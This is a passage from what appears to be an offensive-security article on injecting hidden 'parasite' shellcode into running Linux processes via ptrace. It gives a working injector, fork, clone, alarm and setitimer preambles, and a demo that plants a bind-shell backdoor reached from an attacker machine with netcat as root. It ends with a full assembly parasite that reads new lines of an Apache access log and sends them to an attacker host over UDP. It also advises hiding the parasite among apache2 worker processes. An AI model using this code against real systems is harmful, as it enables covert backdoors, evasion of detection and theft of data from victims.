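    unsigned long start = 0;
    FILE *fp;

    snprintf(path, sizeof path, "/proc/%d/maps", pid);
    if (!(fp = fopen(path, "r")))
        return 0;

    while (fgets(line, sizeof line, fp)) {
        /* e.g.: b7782000-b779c000 r-xp ... /lib/ld-2.7.so             */
        if (strstr(line, "r-xp") && strstr(line, "/ld-")) {
            start = strtoul(line, NULL, 16);  /* start of the range    */
            break;
        }
    }
    fclose(fp);
    return start;
}

int main(int argc, char **argv)
{
    if (argc != 2)
        return 1;
    printf("injection point: 0x%lx\n", find_ldso(atoi(argv[1])));
    return 0;
}

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%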
|
|
|
|
Some considerations about this method: if the infected program uses
|
|
dlopen(), dlclose() or dlsym() during its execution, some problems
|
|
could arise. The solution is to inject into the same library, but in
|
|
unused memory locations.
|
|
(From the tests of the author the initial memory locations of the library
|
|
are not critical and do not affect the execution of programs.)
|
|
|
|
There are other problems on linux systems that use the grsec kernel patch.
|
|
Using this patch the text segment of the host process is marked
|
|
read/execute only and therefore will not be writable with ptrace.
|
|
If that's your case, Ryan O'Neill has published a very powerful
|
|
algorithm [3] that exploits sysenter instructions (used by the host's code)
|
|
to execute a series of system calls (the algorithm is able to
|
|
allocate and set the correct permission on a new memory area without
|
|
modifying the text segment of the traced process).
|
|
I recommend everyone read the document, as it is very interesting.
|
|
|
|
The other premise I want to make in this section regards the basic
|
|
information the injector (the program that injects the parasite) must
|
|
provide to the shellcode to restore the execution of the host program.
|
|
|
|
Our implementation of the injector gets the current EIP (Instruction
|
|
Pointer) of the host process, pushes it on the stack and writes in the EIP
|
|
the address of the parasite (injected into libdl).
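
Stripped of all error handling, that step looks more or less like the
following ptrace sketch (x86 32-bit, parasite length assumed to be
word-aligned; this only illustrates the idea and is not cymothoa's actual
source):

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

/* inject.c -- write the parasite into the target, push the saved EIP
 * on its stack and point EIP at the parasite. Sketch only: no error
 * handling, x86 32-bit, len assumed to be a multiple of 4.            */
#include <string.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <sys/types.h>

void inject(pid_t pid, unsigned long addr, unsigned char *code, int len)
{
    struct user_regs_struct regs;
    long word;
    int i;

    ptrace(PTRACE_ATTACH, pid, NULL, NULL);
    waitpid(pid, NULL, 0);
    ptrace(PTRACE_GETREGS, pid, NULL, &regs);

    for (i = 0; i < len; i += 4) {              /* copy the parasite   */
        memcpy(&word, code + i, 4);
        ptrace(PTRACE_POKETEXT, pid, (void *)(addr + i), (void *)word);
    }

    regs.esp -= 4;                              /* push the saved EIP  */
    ptrace(PTRACE_POKEDATA, pid, (void *)regs.esp, (void *)regs.eip);
    regs.eip = addr;                            /* enter the parasite  */
    ptrace(PTRACE_SETREGS, pid, NULL, &regs);

    ptrace(PTRACE_DETACH, pid, NULL, NULL);
}

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%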
|
|
|
|
The parasite, in its initialization part, saves every register it uses.
|
|
Then, at the end of its execution, every modified register is restored.
|
|
A simple way to do this is to push and pop the registers with the
|
|
instructions PUSHA and POPA.
|
|
|
|
After that, a simple RET instruction restores the execution of the host
|
|
process, since its saved EIP is on the top of the stack.
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
parasite_skeleton:
|
|
|
|
# preamble
|
|
push %eax # save registers
|
|
push %ebx # used by the shellcode
|
|
|
|
# ...
|
|
# shellcode
|
|
# ...
|
|
|
|
# epilogue
|
|
pop %ebx # restore modified registers
|
|
pop %eax # ...
|
|
|
|
ret # restore execution of the host
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
Another very useful piece of information the injector provides to the
shellcode is the address of a persistent memory location. In the case of this
|
|
document, the address is also taken from /proc/pid/maps:
|
|
|
|
...
|
|
b7701000-b771c000 r-xp 00000000 08:03 1261592 /lib/ld-2.11.1.so
|
|
b771c000-b771d000 r--p 0001a000 08:03 1261592 /lib/ld-2.11.1.so
|
|
b771d000-b771e000 rw-p 0001b000 08:03 1261592 /lib/ld-2.11.1.so <--
|
|
...
|
|
|
|
The range b771d000-b771e000 has read and write permission and it's
|
|
suitable for this purpose.
|
|
|
|
Other techniques exist to dynamically create writable and executable
|
|
memory locations, such as the use of mmap() in the host process. But these
|
|
techniques are beyond the scope of this article and will not be analyzed
|
|
here.
|
|
|
|
Since the necessary premises have been made, we can discuss the first
|
|
generation of our stealth parasite.
|
|
|
|
------[ 2. First generation: fork() and clone()
|
|
|
|
The simplest idea to allow the host process to continue its execution
|
|
properly and, at the same time, hide the parasite, is the use of the
|
|
fork() syscall (or the creation of a new thread, not analyzed here).
|
|
|
|
Using fork() the process is split in two:
|
|
- the parent process (the original one) can continue its normal execution
|
|
- the child process, instead, will execute the parasite
|
|
|
|
An important thing to note is that the child process inherits the parent's
|
|
name and a copy of its memory.
|
|
|
|
This means that if we inject the parasite in the process "server1",
|
|
another process "server1" will be created as its child.
|
|
|
|
Before the injection:
|
|
# ps -A
|
|
...
|
|
...
|
|
5478 ? 00:00:00 server1
|
|
...
|
|
|
|
After the injection:
|
|
# ps -A
|
|
...
|
|
...
|
|
5478 ? 00:00:00 server1
|
|
5479 ? 00:00:00 server1
|
|
...
|
|
|
|
If the host process is carefully chosen, the parasite will be very hard
|
|
to detect. Just think of some network services (such as apache2) that
|
|
generate a lot of children: a single child process is unlikely to be
|
|
detected.
|
|
|
|
The fork parasite can be implemented as a preamble preceding the real
|
|
shellcode:
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
fork_parasite:
|
|
push %eax # save %eax value (needed by parent process)
|
|
|
|
push $2
|
|
pop %eax
|
|
int $0x80 # fork
|
|
|
|
test %eax, %eax
|
|
jz shellcode # child: jumps to shellcode
|
|
|
|
pop %eax # parent: restores host process execution
|
|
ret
|
|
|
|
shellcode: # append your shellcode here
|
|
# ...
|
|
# ...
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
The preamble simply makes a call to fork(), analyzes the results, and
|
|
decides the execution path to choose.
|
|
|
|
With this implementation, any existing shellcode can be turned into a
|
|
parasite: it's the responsibility of the injector to concatenate the parts
|
|
before inserting them in the host.
|
|
|
|
A very similar technique uses clone() instead of fork(). We can consider
|
|
clone() a generalization of the fork() syscall through which it's possible
|
|
to create both processes and threads.
|
|
|
|
The difference is in the options passed to the syscall. A thread is
|
|
generated using particular flags:
|
|
|
|
- CLONE_VM the calling process and the child process run in the same
|
|
memory space. Memory writes performed by the calling process
|
|
or by the child process are also visible in the other
|
|
process.
|
|
Any memory mapping or unmapping performed by the child or
|
|
the calling process also affects the other process.
|
|
|
|
- CLONE_SIGHAND the calling process and the child process share the same
|
|
table of signal handlers.
|
|
|
|
- CLONE_THREAD the child is placed in the same thread group as the
|
|
calling process.
|
|
|
|
The CLONE_THREAD flag is the most important: it is what distinguishes what
|
|
we call the "process" from what we call "thread" at least on linux systems.
|
|
|
|
Let's see how the clone() preamble is implemented:
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
clone_parasite:
|
|
pusha # save registers (needed by parent process)
|
|
|
|
# call to sys_clone
|
|
|
|
xorl %eax, %eax
|
|
mov $120, %al
|
|
|
|
movl $0x18900, %ebx # flags: CLONE_VM|CLONE_SIGHAND|
|
|
# CLONE_THREAD|CLONE_PARENT
|
|
|
|
int $0x80 # clone
|
|
|
|
test %eax, %eax
|
|
jz shellcode # child: jumps to shellcode
|
|
|
|
popa # parent: restores host process execution
|
|
ret
|
|
|
|
shellcode: # append your shellcode here
|
|
# ...
|
|
# ...
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
The code is based on the fork() preamble, and its behaviour is very
|
|
similar. The difference is in the result.
|
|
|
|
Before the injection (single threaded process):
|
|
# ps -Am
|
|
...
|
|
...
|
|
8360 pts/3 00:00:00 server1
|
|
- - 00:00:00 -
|
|
...
|
|
|
|
After the injection (an additional thread is created):
|
|
# ps -Am
|
|
...
|
|
...
|
|
8360 pts/3 00:00:00 server1
|
|
- - 00:00:00 -
|
|
- - 00:00:00 -
|
|
...
|
|
|
|
Surely the generation of a thread is more stealthy than the generation of a
|
|
process. However there is a small disadvantage: if the parasite thread
|
|
alters parts of the main thread's state it can bring the host to a crash:
|
|
the use of the shared resources must be much more careful.
|
|
|
|
We have just seen how to create parasites executed as independent processes
|
|
or threads.
|
|
|
|
However, these types of parasites are not completely invisible. In some
|
|
circumstances, and in the case of particular (monitored) processes, the
|
|
generation of a child (process or thread) can be problematic or easily
|
|
detectable.
|
|
|
|
Therefore, in the next section, we will discuss a different type of
|
|
parasite/preamble, deeply integrated with its host.
|
|
|
|
------[ 3. Second generation: signal()/alarm()
|
|
|
|
If we don't like the creation of another process to execute our parasite
|
|
we need some kind of time sharing mechanism inside a single process (did
|
|
you see the title of this document?)
|
|
|
|
It's a scheduling problem: when a new process is created, the operating
|
|
system takes care of assigning it time and resources necessary to its
|
|
execution.
|
|
If we don't want to rely on this mechanism, we have to simulate a scheduler
|
|
within a single process, to allow a concurrent execution of parasite and
|
|
host, using (usually) asynchronous events.
|
|
|
|
When you think of asynchronous events in a Unix-like system, the first
|
|
thing that comes to mind are signals.
|
|
If a process registers a handler for a specific signal, when the signal
|
|
is sent the operating system stops its normal execution and makes a
|
|
(void function) call to the handler.
|
|
When the handler returns, the execution of the process is restored.
|
|
|
|
There are several functions provided by the operating system to generate
|
|
signals. In this chapter we'll use alarm().
|
|
|
|
Alarm() arranges for a SIGALRM signal to be delivered to the calling
|
|
process when an arbitrary number of seconds has passed.
|
|
Its main limitation is that you can not specify time intervals shorter than
|
|
one second, but this is not a problem in most cases.
|
|
|
|
Our parasite/preamble needs to register itself as a handler for the signal
|
|
SIGALRM, and renew the timer every time it is executed, to be called at
|
|
regular intervals.
|
|
This creates a kind of scheduler within a single process, and there is no
|
|
need to call fork() (or functions to create threads).
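
The mechanism is easier to see in plain C before reading the assembly (an
ordinary userland program, not a parasite):

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

#include <unistd.h>
#include <signal.h>

/* One "work step" of the parasite, then re-arm the timer: a tiny
 * cooperative scheduler living inside a single process.               */
void handler(int sig)
{
    write(1, "parasite tick\n", 14);    /* the parasite's work step    */
    signal(SIGALRM, handler);           /* stay registered             */
    alarm(1);                           /* wake up again in one second */
}

int main(void)
{
    signal(SIGALRM, handler);
    alarm(1);
    for (;;)
        pause();                        /* the "host" goes on with     */
    return 0;                           /* its own business            */
}

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%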
|
|
|
|
Here is our second generation parasite/preamble:
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
# signal/alarm parasite
|
|
|
|
handler:
|
|
pusha
|
|
# alarm(timeout)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
mov $27, %al
|
|
mov $0x1, %bl # 1 second
|
|
int $0x80
|
|
|
|
schedule:
|
|
# signal(SIGALRM, handler)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
mov $48, %al
|
|
mov $14, %bl
|
|
jmp schedule_end # load schedule_end address
|
|
load_handler:
|
|
pop %ecx
|
|
subl $0x23, %ecx # adjust %ecx to point handler()
|
|
int $0x80
|
|
popa
|
|
jmp shellcode
|
|
|
|
schedule_end:
|
|
call load_handler
|
|
|
|
shellcode: # append your shellcode here
|
|
# ...
|
|
# ...
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
Of course the type of shellcode you can append to the preamble must
|
|
be aware of the "alternative" scheduling mechanism.
|
|
|
|
It must be able to split its operations between multiple calls, and must
|
|
also not take too much time to run a single step (i.e. a single call),
|
|
to not slow down the host program or overlap with the next handler call.
|
|
|
|
In short, a call to the handler (our parasite), to work properly must last
|
|
less than the timer interval.
|
|
|
|
However, alarm() is not the only function able to simulate a scheduler.
|
|
In the next chapter we will see a more advanced function, which allows a
|
|
more granular control of the execution of the parasite.
|
|
|
|
------[ 4. Third generation: setitimer()
|
|
|
|
We've just arrived at the latest generation of the parasite.
|
|
In the first part of the chapter we'll spend some time to analyze the
|
|
function setitimer(), on which the code is based.
|
|
|
|
The definition of the function is:
|
|
int setitimer(int which, const struct itimerval *new_value,
|
|
struct itimerval *old_value);
|
|
|
|
As in the case of alarm(), the function setitimer() provides a mechanism
|
|
for a process to interrupt itself in the future using signals.
|
|
Unlike alarm, however, you can specify intervals of a few microseconds and
|
|
choose various types of timers and time domains.
|
|
|
|
The argument "int which" allows to choose the type of timer and therefore
|
|
the signal that will be sent to the process:
|
|
|
|
ITIMER_REAL 0x00 the most used timer, it decrements in real time, and
|
|
delivers SIGALRM upon expiration.
|
|
|
|
ITIMER_VIRTUAL 0x01 decrements only when the process is executing, and
|
|
delivers SIGVTALRM upon expiration.
|
|
|
|
ITIMER_PROF 0x02 decrements both when the process executes and when the
|
|
system is executing on behalf of the process. Coupled
|
|
with ITIMER_VIRTUAL, this timer is usually used to
|
|
profile the time spent by the application in user and
|
|
kernel space. SIGPROF is delivered upon expiration.
|
|
|
|
We will use ITIMER_REAL because it allows the generation of signals at
|
|
regular intervals, and is not influenced by environmental factors such as
|
|
the workload of a system.
|
|
|
|
The argument "const struct itimerval *new_value" points to an itimerval
|
|
structure, defined as:
|
|
|
|
struct itimerval {
|
|
struct timeval it_interval; /* next value */
|
|
struct timeval it_value; /* current value */
|
|
};
|
|
|
|
struct timeval {
|
|
long tv_sec; /* seconds */
|
|
long tv_usec; /* microseconds */
|
|
};
|
|
|
|
The last timeval structure, it_value, is the period between the calling of
|
|
the function and the first timer interrupt. If zero, the alarm is disabled.
|
|
|
|
The first one, it_interval, is the period between successive timer
|
|
interrupts. If zero, the alarm will only be sent once.
|
|
|
|
We'll set both structures at the same time interval.
|
|
|
|
The last argument, "struct itimerval *old_value", if not NULL, will be set
|
|
by the function at the value of the previous timer. We'll not use this
|
|
feature.
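
In plain C the whole mechanism boils down to something like this, using the
same 0x5000 microsecond period that appears in the assembly below:

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

#include <unistd.h>
#include <signal.h>
#include <sys/time.h>

void handler(int sig)
{
    write(1, "tick\n", 5);                  /* one step of work        */
}

int main(void)
{
    struct itimerval tv;

    tv.it_value.tv_sec     = 0;             /* first expiration        */
    tv.it_value.tv_usec    = 0x5000;
    tv.it_interval.tv_sec  = 0;             /* period of the next ones */
    tv.it_interval.tv_usec = 0x5000;

    signal(SIGALRM, handler);
    setitimer(ITIMER_REAL, &tv, NULL);      /* SIGALRM every ~20 ms    */

    for (;;)
        pause();
    return 0;
}

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%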
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
# setitimer parasite
|
|
|
|
setitimer_hdr:
|
|
pusha
|
|
# sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
xorl %edx, %edx
|
|
mov $104, %al
|
|
jmp struct_itimerval # load itimervar structure
|
|
load_struct:
|
|
pop %ecx
|
|
int $0x80
|
|
popa
|
|
jmp handler
|
|
|
|
struct_itimerval:
|
|
call load_struct
|
|
# itimerval structure: you can modify the values
|
|
# to set your time intervals
|
|
.long 0x0 # seconds
|
|
.long 0x5000 # microseconds
|
|
.long 0x0 # seconds
|
|
.long 0x5000 # microseconds
|
|
|
|
# signal handler, called by the timer
|
|
handler:
|
|
pusha
|
|
# signal(SIGALRM, handler)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
mov $48, %al
|
|
mov $14, %bl
|
|
jmp handler_end # load handler_end address
|
|
load_handler:
|
|
pop %ecx
|
|
subl $0x19, %ecx # adjust %ecx to point handler()
|
|
int $0x80
|
|
popa
|
|
jmp shellcode
|
|
|
|
handler_end:
|
|
call load_handler
|
|
|
|
shellcode: # append your shellcode here
|
|
# ...
|
|
# ...
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
The usage of this preamble is similar to the previous (alarm) one; there
|
|
is only the necessity of a fine-tuned timer: a compromise between the
|
|
frequency of executions and the stability of the parasite, which must be
|
|
able to carry out its operations in less time than a timer's cycle.
|
|
|
|
You can work around this problem by transforming these preambles
|
|
(including the preamble that makes use of alarm()) in epilogues, so that
|
|
the timer starts counting only after the parasite has finished its
|
|
operations.
|
|
|
|
In fact we are going to see how this was implemented in the real parasites
|
|
presented below.
|
|
|
|
------[ 5. Working parasites
|
|
|
|
Here we come to the practical part. Three working parasites will be
|
|
presented: one for each technique exposed in the theoretical part of the
|
|
document.
|
|
|
|
To inject the parasites the injector cymothoa [4] was used, written by the
|
|
same author, which already includes the codes presented in the article.
|
|
Although it is possible, through various techniques, to inject shellcodes
|
|
in processes, the download of the program is recommended to try the
|
|
examples while reading.
|
|
|
|
------------[ 5.1 Process and thread backdoor
|
|
|
|
Our first real parasite is a backdoor created by applying, to pre-existing
|
|
shellcode, the fork() preamble.
|
|
The shellcode used was developed by izik (izik@tty64.org) and is
|
|
available on several sites [5]. For this reason it will not be reported.
|
|
|
|
The shellcode is a classic exploit shellcode: it binds /bin/sh to a TCP
|
|
port and forks a shell for every connection.
|
|
|
|
Using it aided by an injector has several advantages:
|
|
- The ability to configure its behavior. In this case the possibility to
|
|
choose the port to listen on.
|
|
- The possibility of keeping the host alive using one of the
|
|
preambles shown earlier.
|
|
- Not having to worry about memory locations necessary to the execution
|
|
and data storage, since they are automatically provided.
|
|
|
|
Let's see in practice how this parasite works...
|
|
|
|
First, on the victim machine, we must identify a suitable host process.
|
|
In this example we will use an instance of cat, since it's really easy to
|
|
check if it continues its execution after the injection.
|
|
|
|
root@victim# ps -A | grep cat
|
|
1727 pts/6 00:00:00 cat
|
|
|
|
We need this pid for the injection:
|
|
|
|
root@victim# cymothoa -p 1727 -s 1 -y 5555
|
|
[+] attaching to process 1727
|
|
|
|
register info:
|
|
-----------------------------------------------------------
|
|
eax value: 0xfffffe00 ebx value: 0x0
|
|
esp value: 0xbf81e1c8 eip value: 0xb78be430
|
|
------------------------------------------------------------
|
|
|
|
[+] new esp: 0xbf81e1c4
|
|
[+] payload preamble: fork
|
|
[+] injecting code into 0xb78bf000
|
|
[+] copy general purpose registers
|
|
[+] detaching from 1727
|
|
|
|
[+] infected!!!
|
|
root@victim#
|
|
|
|
The process is now infected: we should be able to see two cat instances,
|
|
the original one and the new one that corresponds to the parasite:
|
|
|
|
root@victim# ps -A | grep cat
|
|
1727 pts/6 00:00:00 cat
|
|
1842 pts/6 00:00:00 cat
|
|
|
|
If, from a different machine, we try to connect to the port 5555, we should
|
|
get a shell:
|
|
|
|
root@attacker# nc -vv victim 5555
|
|
Connection to victim 5555 port [tcp/*] succeeded!
|
|
uname -a
|
|
Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
|
|
whoami
|
|
root
|
|
|
|
At the same time, if we write a few lines in the console where the original
|
|
cat is running, we should see the usual output:
|
|
|
|
root@victim# cat
|
|
test123
|
|
test123
|
|
foo
|
|
foo
|
|
|
|
The backdoor functions properly: the two processes are running at the same
|
|
time without crashing...
|
|
|
|
The same backdoor can also be injected in a similar way using the clone()
|
|
preamble, and thus running the parasite as a new thread instead of a new
|
|
process.
|
|
|
|
The command is similar, we only disable the fork() preamble and force
|
|
clone() instead:
|
|
|
|
root@victim# cymothoa -p 9425 -s 1 -y 5555 -F -b
|
|
[+] attaching to process 9425
|
|
|
|
register info:
|
|
-----------------------------------------------------------
|
|
eax value: 0xfffffe00 ebx value: 0x0
|
|
esp value: 0xbfb4beb8 eip value: 0xb78da430
|
|
------------------------------------------------------------
|
|
|
|
[+] new esp: 0xbfb4beb4
|
|
[+] payload preamble: thread
|
|
[+] injecting code into 0xb78db000
|
|
[+] copy general purpose registers
|
|
[+] detaching from 9425
|
|
|
|
[+] infected!!!
|
|
|
|
If we execute ps without special flags we now see only one process:
|
|
|
|
root@victim# ps -A | grep cat
|
|
9425 pts/3 00:00:00 cat
|
|
|
|
But with the option -m we see an additional thread:
|
|
|
|
root@victim# ps -Am
|
|
...
|
|
9425 pts/3 00:00:00 cat
|
|
- - 00:00:00 -
|
|
- - 00:00:00 -
|
|
...
|
|
...
|
|
|
|
Using netcat on the port 5555 of the victim machine works as expected.
|
|
|
|
Some notes on the proper use of the fork() and clone() preambles:
|
|
- This preamble is compatible with virtually any existing shellcode,
|
|
without any modification. It can be used to easily transform into
|
|
parasitic code what you have already written.
|
|
In the case of clone() preamble the situation is slightly more critical
|
|
because there is the possibility that the parasite thread interferes
|
|
with the host thread. However, widespread shellcodes are usually
|
|
already attentive to these issues, and should not cause problems.
|
|
- It is better to inject the parasite into servers that generate many
|
|
child processes. Some of those tested by me are apache2, dhclient3 and,
|
|
in the case of a desktop system, the processes of the window manager.
|
|
It's hard to find a needle in a haystack, and it is difficult to tell
|
|
a single parasite from dozens of apache2 processes ;)
|
|
|
|
------------[ 5.2 Remote "tail follow" parasite
|
|
|
|
Have you ever used tail with the "-f" (follow) option? This mode is used
|
|
to monitor text files, usually logs, to see in real time the new lines
|
|
added by other processes.
|
|
|
|
Tail accepts as an option a sleep interval, the waiting time between one
|
|
check of the file and the next.
|
|
|
|
It's therefore natural, when writing a parasite with the same function, to
|
|
use a preamble that allows a precise control of time: the setitimer()
|
|
preamble.
|
|
|
|
This is the code of this new parasite... It is more complex than the
|
|
previous codes.
|
|
After the source there will be a brief explanation of its operations, and
|
|
finally an example of its practical use.
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<
|
|
|
|
#
|
|
# Scheduled tail setitimer parasite
|
|
#
|
|
|
|
#
|
|
# Preamble
|
|
#
|
|
|
|
setitimer_hdr:
|
|
pusha
|
|
# sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
xorl %edx, %edx
|
|
mov $104, %al
|
|
jmp struct_itimerval
|
|
load_struct:
|
|
pop %ecx
|
|
int $0x80
|
|
popa
|
|
jmp handler
|
|
|
|
struct_itimerval:
|
|
call load_struct
|
|
# these values are replaced by the injector:
|
|
.long 0x0#53434553 # seconds
|
|
.long 0x5343494d # microseconds
|
|
.long 0x0#53434553 # seconds
|
|
.long 0x5343494d # microseconds
|
|
|
|
handler:
|
|
pusha
|
|
# signal(SIGALRM, handler)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
mov $48, %al
|
|
mov $14, %bl
|
|
jmp handler_end
|
|
load_handler:
|
|
pop %ecx
|
|
subl $0x19, %ecx # adjust %ecx to point handler()
|
|
int $0x80
|
|
popa
|
|
jmp shellcode
|
|
|
|
handler_end:
|
|
call load_handler
|
|
#
|
|
# The shellcode starts here
|
|
#
|
|
|
|
shellcode:
|
|
pusha
|
|
|
|
# check if already initialized
|
|
mov $0x4d454d50, %esi # replaced by the injector
|
|
# (persistent memory address)
|
|
mov (%esi), %eax
|
|
cmp $0xdeadbeef, %eax
|
|
je open_call # jump if already initialized
|
|
|
|
# initialize
|
|
mov $0xdeadbeef, %eax
|
|
mov %eax, (%esi)
|
|
add $4, %esi
|
|
xorl %eax, %eax
|
|
mov %eax, (%esi)
|
|
sub $4, %esi
|
|
|
|
open_call:
|
|
# call to sys_open(file_path, O_RDONLY)
|
|
xorl %eax, %eax
|
|
mov $5, %al
|
|
jmp file_path
|
|
load_file_path:
|
|
pop %ebx
|
|
xorl %ecx, %ecx
|
|
int $0x80 # %eax = file descriptor
|
|
mov %eax, %edi # save file descriptor
|
|
|
|
check_file_length:
|
|
# call to sys_lseek(fd, 0, SEEK_END)
|
|
mov %edi, %ebx
|
|
xorl %eax, %eax
|
|
mov $19, %al
|
|
xorl %ecx, %ecx
|
|
xorl %edx, %edx
|
|
mov $2, %dl
|
|
int $0x80 # %eax = end of file offset (eof)
|
|
|
|
# get old eof, and store new eof
|
|
add $4, %esi
|
|
mov (%esi), %ebx
|
|
mov %eax, (%esi)
|
|
|
|
# skip the first read
|
|
test %ebx, %ebx
|
|
jz return_to_main_proc
|
|
|
|
# check if file is larger
|
|
# (current end of file > previous end of file)
|
|
cmp %eax, %ebx
|
|
je return_to_main_proc # eof not changed:
|
|
# return to main process
|
|
|
|
calc_data_len:
|
|
# calculate new data length
|
|
# (current eof - last eof)
|
|
mov %eax, %esi
|
|
sub %ebx, %esi # saved in %esi
|
|
|
|
set_new_position:
|
|
# call to sys_lseek(fd, last_eof, SEEK_SET)
|
|
xorl %eax, %eax
|
|
mov $19, %al
|
|
mov %ebx, %ecx
|
|
mov %edi, %ebx
|
|
xorl %edx, %edx
|
|
int $0x80 # %eax = last end of file offset
|
|
|
|
read_file_tail:
|
|
# allocate buffer
|
|
sub %esi, %esp
|
|
|
|
# call to sys_read(fd, buf, count)
|
|
xorl %eax, %eax
|
|
mov $3, %al
|
|
mov %edi, %ebx
|
|
mov %esp, %ecx
|
|
mov %esi, %edx
|
|
int $0x80 # %eax = bytes read
|
|
mov %esp, %ebp # save pointer to buffer
|
|
|
|
open_socket:
|
|
# call to sys_socketcall($0x01 (socket), *args)
|
|
xorl %eax, %eax
|
|
mov $102, %al
|
|
xorl %ebx, %ebx
|
|
mov $0x01, %bl
|
|
jmp socket_args
|
|
load_socket_args:
|
|
pop %ecx
|
|
int $0x80 # %eax = socket descriptor
|
|
jmp send_data
|
|
|
|
socket_args:
|
|
call load_socket_args
|
|
.long 0x02 # AF_INET
|
|
.long 0x02 # SOCK_DGRAM
|
|
.long 0x00 # NULL
|
|
|
|
send_data:
|
|
|
|
# prepare sys_socketcall (sendto) arguments
|
|
jmp struct_sockaddr
|
|
load_sockaddr:
|
|
pop %ecx
|
|
push $0x10 # sizeof(struct_sockaddr)
|
|
push %ecx # struct_sockaddr address
|
|
xorl %ecx, %ecx
|
|
push %ecx # flags
|
|
push %edx # buffer len
|
|
push %ebp # buffer pointer
|
|
push %eax # socket descriptor
|
|
|
|
# call to sys_sendto($11 (sendto), *args)
|
|
xorl %eax, %eax
|
|
mov $102, %al
|
|
xorl %ebx, %ebx
|
|
mov $11, %bl
|
|
mov %esp, %ecx
|
|
int $0x80
|
|
jmp restore_stack
|
|
|
|
struct_sockaddr:
|
|
call load_sockaddr
|
|
.short 0x02 # AF_INET
|
|
.short 0x5250 # PORT (replaced by the injector)
|
|
.long 0x34565049 # DEST IP (replaced by the injector)
|
|
|
|
restore_stack:
|
|
# restore stack
|
|
pop %ebx # socket descriptor
|
|
pop %eax # buffer pointer
|
|
pop %edx # buffer len
|
|
pop %eax # flags
|
|
pop %eax # struct_sockaddr address
|
|
pop %eax # sizeof(struct_sockaddr)
|
|
|
|
# deallocate buffer
|
|
add %edx, %esp
|
|
|
|
|
|
close_socket:
|
|
# call to sys_close(socket)
|
|
xorl %eax, %eax
|
|
mov $6, %al
|
|
int $0x80
|
|
|
|
return_to_main_proc:
|
|
|
|
# call to sys_close(fd)
|
|
xorl %eax, %eax
|
|
mov $6, %al
|
|
mov %edi, %ebx
|
|
int $0x80
|
|
|
|
# return
|
|
popa
|
|
ret
|
|
|
|
file_path:
|
|
call load_file_path
|
|
.ascii "/var/log/apache2/access.log"
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
The code is not written in a super-compact way, since space is not
|
|
a problem and the ease of programming and modification has been preferred.
|
|
|
|
The code can be summarized in a few steps:
|
|
1) Preamble (we already know).
|
|
2) Check to see if it's the first execution. This step makes use of a
|
|
persistent memory location, provided by the injector.
|
|
3) File open and check of length.
|
|
4) Comparison with previous file's length.
|
|
4.1) If unchanged the parasite returns the execution to the host process.
|
|
4.2) If changed the execution continues.
|
|
5) Read the new lines of the file.
|
|
6) Send the new lines to the attacker via UDP
|
|
7) Restore the stack
|
|
8) Return the execution to the host process.
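
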